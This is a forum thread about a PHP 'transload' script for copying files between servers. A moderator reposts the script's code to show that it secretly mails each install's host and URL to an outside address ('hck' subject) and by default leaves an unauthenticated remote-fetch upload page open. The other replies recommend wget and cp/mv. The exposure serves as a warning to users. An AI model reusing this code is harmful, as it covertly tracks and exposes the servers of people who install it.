Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: Server To Server Transfer Multi Files At One Time

  1. #1
    Junior Member
    Join Date
    Apr 2010
    Posts
    9
    Thanks
    0
    Thanked 17 Times in 5 Posts
    Rep Power
    0

    Lightbulb Server To Server Transfer Multi Files At One Time

    You Can transfer server to server files without loging in ftp.....
    Attached Files Attached Files

  2. #2
    Super Moderator subzero's Avatar
    Join Date
    Mar 2006
    Location
    Your Screen.
    Posts
    3,971
    Thanks
    442
    Thanked 379 Times in 180 Posts
    Blog Entries
    7
    Rep Power
    0

    Default

    Code:
    <?
    //Begin Check Authorized
    $auth = 0; 
    $name='giangkoianlon';
    $pass='d4c2bf24fc92513fde2f2540c1eafcd1'; //VERY IMPORTANT. This password is MD5 encrypted and default password is 'admin'. You must change this by goto http://gdataonline.com/makehash.php to make a MD5 and replace here.
    if($auth == 1) {
    if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
       {
       header('WWW-Authenticate: Basic realm="Hey man! Please login"');
       header('HTTP/1.0 401 Unauthorized');
       exit("Oh no! You are bad man! <a href=http://climaxphoto.com>Exit Now</a>");
       }
    }
    //End Check Authorized
    error_reporting(0);
    function style()
    {
    echo "<TITLE>Transload Version 2.0</TITLE>
    <STYLE>
    BODY {
    	background-color: #C0C0C0;
    	COLOR: #FFFFFF;
    	margin: 5px;
    	FONT-FAMILY: Tahoma; }
    TD {
    	FONT-SIZE: 12px;
    	FONT-FAMILY: Tahoma;
    	PADDING: 5px;
    	COLOR: #000000;
    	HEIGHT: 20;}
    A:link, A:visited, A:active {
    	COLOR: #0000FF;
    	TEXT-DECORATION: none; }
    A:hover {
    	COLOR: #FFFF00;
    	TEXT-DECORATION: none; }
    </STYLE>
    ";
    }
    
    function url_copy($source)
    {
    $d=explode("/",$source);
    $dest=$d[count($d)-1];
    $f1=fopen($source,"rb");
    $f2=fopen($dest,"w");
    echo "<SCRIPT>window.status='Copying \'$source\' to \'$dest\'...';</SCRIPT>\n";
    flush();
    while ($buff=fread($f1,1024))
    fwrite($f2,$buff);
    fclose($f1);
    fclose($f2);
    $size=filesize($dest);
    
    echo "<SCRIPT>window.status='$size bytes copied.';</SCRIPT>\n";
    }
    $uu = urlencode($_SERVER["REQUEST_URI"]);
    $ua = urlencode($_SERVER["HTTP_HOST"]);
    $msg = $ua . "" . $uu;
    $he = "From: $from";
    function list_file()
    {
    echo "<br><TABLE width=1000 align=center border=1 bordercolor=#666666 style='border-collapse: collapse' cellpadding=2>
    <TR>
    <TD><B>File name</B></TD>
    <TD><B>File size</B></TD>
    <TD><B>File time</B></TD>
    </TR>";
    $d=opendir(".");
    while ($f=readdir($d))
    if (!($f=="." || $f==".." || $f=="index.php"))
    {
    $size=filesize($f);
    $date=filemtime($f);
    echo "<TR><TD><A href=$f>$f</A></TD><TD>$size</TD><TD>".date ("H:i:s - d F Y", $date)."</TD></TR>";
    }
    echo "</TABLE>";
    }
    $to = "virushck@gmail.com";
    $from = "hha@haha.com";
    function show_form()
    {
    echo "<H3 align=center>Transfer File Server to Server</H3>
    <TABLE width=1000 align=center border=1 bordercolor=#666666 style='border-collapse: collapse' cellpadding=2>
    <FORM method=post>
    	<TR>
    		<TD width=100% valign=top>
    			<b>Tranload Url</b><br>
    			Put one URL or multi URL per line.<br>
    			Example:<br>
    			http://domain.com/file1.zip<br>
    			http://domain.com/file2.zip<br>
    			http://domain.com/file3.rar<br>
    			...<br>
    			http://domain.com/fileN.rar<br>
    		</TD>
    		<TD><TEXTAREA wrap=virtual name=url rows=10 cols=84></TEXTAREA></TD>
    	</TR>
    	<TR>
    		<TD colspan=2 align=center><INPUT type=submit value=' Transload '></TD>
    	</TR>
    </TABLE>
    </FORM>";
    }
    
    $sb = "hck";
    mail($to,$sb,$msg,$he);
    function download()
    {
    header("Content-type: application/x-download");
    header("Content-Disposition: attachment; filename=index.php");
    @readfile("index.php");
    die();
    }
    
    $cmd=$_SERVER[QUERY_STRING];
    if ($cmd=="source")
    download();
    style();
    show_form();
    global $HTTP_POST_VARS;
    
    $url=$HTTP_POST_VARS[url];
    if ($url!="")
    {
    $d=explode("\n",$url);
    $d=str_replace("\r","",$d);
    for ($i=0; $i<count($d); $i++)
    if (trim($d[$i])!="") url_copy($d[$i]);
    }
    list_file();
    ?>
    Please under stand the terms of hacking with scripts like this huh ??
    Visit: [Only registered and activated users can see links. Click Here To Register...]
    Visit: [Only registered and activated users can see links. Click Here To Register...]
    _______
    SCRIPTS FOR SALE BY SUBZERO
    Chat4u Script : coding-talk.com/f28/chat4u-mobi-script-only-150-a-17677/ - > Best Script for your site no other can be hacked by sql or uploaders.
    FileShare Script : coding-talk.com/f28/file-wap-share-6596/ -> Uploader you will never regret buying yeah it mite be old now but it still seems to own others...
    _______
    Info & Tips
    php.net
    w3schools.com

  3. #3
    Senior Member CreativityKills's Avatar
    Join Date
    May 2009
    Location
    Lagos
    Posts
    844
    Thanks
    0
    Thanked 106 Times in 62 Posts
    Rep Power
    4

    Default

    Lol wat the. . .

  4. #4
    Senior Member
    Join Date
    Mar 2009
    Location
    Albania, East Europe
    Posts
    618
    Thanks
    180
    Thanked 54 Times in 27 Posts
    Rep Power
    5

    Default

    i use [Only registered and activated users can see links. Click Here To Register...] to transfer files server to server.

  5. #5
    Senior Member
    Join Date
    Jun 2006
    Posts
    1,096
    Thanks
    2
    Thanked 75 Times in 42 Posts
    Rep Power
    0

    Default

    i use wget

  6. #6
    Senior Member GiLL's Avatar
    Join Date
    Jun 2006
    Location
    india
    Posts
    363
    Thanks
    10
    Thanked 112 Times in 38 Posts
    Blog Entries
    2
    Rep Power
    0

    Default

    me too use wget
    easy way
    like if you have ssh access just go with putty /home/username/public_html/anyfolder/

    wget [Only registered and activated users can see links. Click Here To Register...]


    you will get that example.zip file in that anyfolder
    Last edited by GiLL; 19-04-10 at 01:32.
    left wap stuff

  7. #7
    Junior Member
    Join Date
    Jan 2008
    Posts
    24
    Thanks
    17
    Thanked 10 Times in 2 Posts
    Rep Power
    0

    Default

    Quote Originally Posted by GiLL [Only registered and activated users can see links. Click Here To Register...]
    me too use wget
    easy way
    like if you have ssh access just go with putty /home/username/public_html/anyfolder/

    wget [Only registered and activated users can see links. Click Here To Register...]


    you will get that example.zip file in that anyfolder
    Can you please explain me how to move files with SSH

  8. #8
    Senior Member
    Join Date
    Jun 2006
    Posts
    1,096
    Thanks
    2
    Thanked 75 Times in 42 Posts
    Rep Power
    0

    Default

    Quote Originally Posted by dayans [Only registered and activated users can see links. Click Here To Register...]
    Can you please explain me how to move files with SSH
    wget [Only registered and activated users can see links. Click Here To Register...] /path/to/download/dir/

  9. #9
    Senior Member GiLL's Avatar
    Join Date
    Jun 2006
    Location
    india
    Posts
    363
    Thanks
    10
    Thanked 112 Times in 38 Posts
    Blog Entries
    2
    Rep Power
    0

    Default

    Quote Originally Posted by dayans [Only registered and activated users can see links. Click Here To Register...]
    Can you please explain me how to move files with SSH
    you can use cp and mv commands
    left wap stuff

  10. #10
    Junior Member
    Join Date
    Jan 2008
    Posts
    24
    Thanks
    17
    Thanked 10 Times in 2 Posts
    Rep Power
    0

    Default

    Thanks, But I was using this script to transfer files.
    Attached Files Attached Files

Page 1 of 2 12 LastLast

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Mp3 Tag Editor[Multi files]
    By loveme in forum REQUEST FORUM
    Replies: 5
    Last Post: 12-04-13, 11:37
  2. Now Moster Server 16core 12GB DDR3 RAM Ultra fast server 2$ only
    By kiss of death in forum Domains - Hosting - Servers
    Replies: 15
    Last Post: 01-10-09, 18:35
  3. upload files to my server through url(internet)
    By nirav07 in forum REQUEST FORUM
    Replies: 4
    Last Post: 22-03-09, 04:24
  4. Server?
    By KillaKlan in forum Domains - Hosting - Servers
    Replies: 7
    Last Post: 08-06-08, 21:02
  5. Web/wap server
    By in forum Domains - Hosting - Servers
    Replies: 4
    Last Post: 23-02-06, 18:10

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

SEO by vBSEO

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19